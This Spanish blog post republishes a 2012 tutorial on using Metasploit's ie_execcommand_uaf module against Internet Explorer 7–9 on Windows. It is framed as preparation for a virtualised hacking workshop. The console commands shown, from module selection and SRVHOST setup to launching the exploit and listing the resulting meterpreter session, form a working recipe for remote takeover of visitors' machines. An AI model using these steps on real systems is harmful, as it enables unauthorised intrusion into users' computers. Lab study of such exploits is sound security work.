Este 0-Day lleva bastante tiempo publicado y es una falla que afecta a las versiones de Internet Explorer (7, 8 y 9 ) en sus distintas versiones de Windows. De tal manera realizaremos un taller tomando esta vulnerabilidad de IE y la exploraremos con Metasploit, así entenderemos como funciona un exploit y los peligros que una falla de seguridad conlleva.
Antes de comenzar aclarare que la entrada original fue publicada en el blog de 0verl0ad.com en 2012 y me he tomado la libertad de publicarla sin tomar crédito de aquello, solo preparo los cimientos para la construcción de un taller de hacking, virtualizando algunas maquinas y poder estudiar el asunto mencionado.
0-day en IE y Metasploit, al ataque!!
Hace unos días aparecía una vulnerabilidad (un 0day) que afecta a diferentes versiones de Internet Explorer (IE 7, 8 y 9) y a las diversas versiones del sistema operativo de Microsoft que lo utilizan (Windows XP, Windows Vista y Windows 7). Hoy leyendo mis RSS leo en Flu-Project que Metasploit ya lo tiene implementado, así que vamos a ver como utilizarlo
Lo primero, SIEMPRE, antes de utilizar Metasploit, hay que actualizarlo, para ello:
Lo primero, SIEMPRE, antes de utilizar Metasploit, hay que actualizarlo, para ello:
msfupdate
una vez este al día lo iniciamos con:
msfconsole
y veremos su bonita presentación (son geniales los banners de metasploit xD):
Lo siguiente es seleccionar el exploit a utilizar, para ello:
use exploit/windows/browser/ie_execcommand_uaf
Siempre que vamos a ejecutar un exploit o cualquier funcionalidad que ofrece metasploit, es recomendable el comando info que nos mostrara informacion del mismo:
info
En este caso vemos que el exploit funciona sobre:
- IE7 en Windows XP SP3
- IE8 en Windows XP SP3
- IE7 en Windows Vista
- IE8 en Windows Vista
- IE8 en Windows 7
- IE9 en Windows 7
Las pruebas las se han realizado sobre un Windows 7 con IE 8, pero teóricamente soporta todas esas versiones y SO.
El siguiente paso es especificar la IP del servidor donde se preparará el exploit, es decir, nuestra IP, para ello:
set SRVHOST <IP>
en el ejemplo:
set SRVHOST 192.168.0.111
y por último lanzar el exploit:
exploit
Con esto el servidor se quedará en espera de conexiones, entonces, cuando la víctima acceda a la dirección que nos mostrará Metasploit (campo Using URL), se lanzará el exploit :D
Al final de todo el proceso, sino ha habido ningún problema, tendremos una sesión de meterpreter:
sessions -l
Listo, ya está todo el proceso, y al ser una vulnerabilidad 0day todavía no está corregida aumentando su peligrosidad.
Si queréis más información, aquí tenéis una entrada del blog de rapid7 => https://community.rapid7.com/community/metasploit/blog/2012/09/17/lets-start-the-week-with-a-new-internet-explorer-0-day-in-metasploit
Nos leemos en breve
0 comentarios:
Publicar un comentario